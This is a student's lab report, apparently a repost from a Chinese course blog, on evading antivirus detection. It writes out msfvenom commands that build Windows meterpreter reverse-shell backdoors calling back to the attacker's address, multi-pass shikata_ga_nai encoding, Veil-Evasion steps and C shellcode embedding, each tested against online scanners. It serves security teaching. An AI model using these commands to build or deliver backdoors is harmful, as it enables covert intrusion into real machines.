20169205 2016-2017-2 《网络攻防技术》 免杀技术

20169205 2016-2017-2 《网络攻防技术》 免杀技术

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码的检测

恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。

  • 启发式恶意软件检测

  • 基于行为的恶意软件检测

如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。

(2)免杀是做什么?

使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。

(3)免杀的基本方法有哪些?

  • 改变特征码

对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码

  • 改变攻击行为

基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

实践总结与体会

此次实验使我深入了解了杀毒软件查杀的原理,以及恶意代码的伪装手段。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。因此,了解相关恶意程序的原理和伪装手段对提高网络安全意识和增强病毒防护能力由很大的帮助。

离实战还缺些什么技术或步骤?

实际环境中,我们很难将后门程序移植进靶机中,这就需要把这个后门程序伪装后绑定到一些正规的程序中来让后门程序进入靶机。另外我们需要对靶机的状态进行跟踪。

实践过程记录

1.使用msf编码器直接生成一个后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded.exe

文件传送到windows以后被查杀,找回后上传到virscan扫描,有21/39款杀软鉴定它为恶意代码
检测过程如图所示:

732832-20170531150321571-1546248705.png

732832-20170531150326805-467744323.png

2.使用msf编码器对恶意代码进行10次编码,并生成一个后门文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe

文件传送到windows以后仍然被查杀
将.exe文件拷贝出来到靶机上,放在某个路径下(保证杀毒软件开启),发现被查杀,然后找回原文件。

使用msf编码器对恶意代码进行10次编码,并生成一个后门文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded10.exe

文件传送到windows以后仍然被查杀

找回后上传到virscan扫描,有20/39款杀软鉴定它为恶意代码

732832-20170531150817977-892376140.png

732832-20170531150823321-969956882.png

对比查杀分析信息后发现其中一个名为Quickheal的杀软没有检测出多次编码后的恶意代码,说明这个杀软比较弱,不过也说明多次编码对个别杀软是有一定作用的,不过整体来讲对恶意代码成功植入靶机还是几率不大

3.使用veil-evasion免杀平台

kali原本没有veil-evasion ,所以需要先安装

sudo ape-get install veil-evasion

menu下依次输入语言、ip、端口号以及文件名等

use python/meterpreter/rev_tcp
set LHOST 172.16.2.169
generate
5329
1

将生成的可执行文件传送到windows,传送时windows杀软没有检测到文件为恶意代码并杀死它

在windows文件中找到恶意代码(5329.exe),上传到virscan扫描发现有10/39款杀软识别出它是恶意代码
732832-20170531151311602-1671019654.png

732832-20170531151244836-712221436.png

4.shellcode编程

在kali终端下生成一个c格式的十六进制数组,Ip为kali的

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=443 -f c

按照实验教程模版在windows VS 中编写一个c语言的shellcode代码,并将kali中生成的带有kali ip的十六进制数组加入c代码的编写中,
kali中运行msf监听
732832-20170531151546071-1731624341.png

windows中VS调试shellcode代码,360杀软检测出木马,建议清除

将c代码上传到virscan扫描,结果显示0/39的杀毒软件鉴定为恶意代码,可能是该网站的病毒库没有及时更新,或者我们生成的恶意代码已经不太具有恶意代码的特征或行为不太像恶意代码
732832-20170531151708227-1402571820.png

学习进度条

时间学习时间目标实际进行时间
第一周88
第二周108.5
第三周1210.5
第四周1212
第五周1211
第六周1213
第七周1212
第八周1212
第九周1212
第十周1212
第十一周1211
第十二周1212
第十三周1210
第十四周1212

参考资料

转载于:https://www.cnblogs.com/wule/p/6924353.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值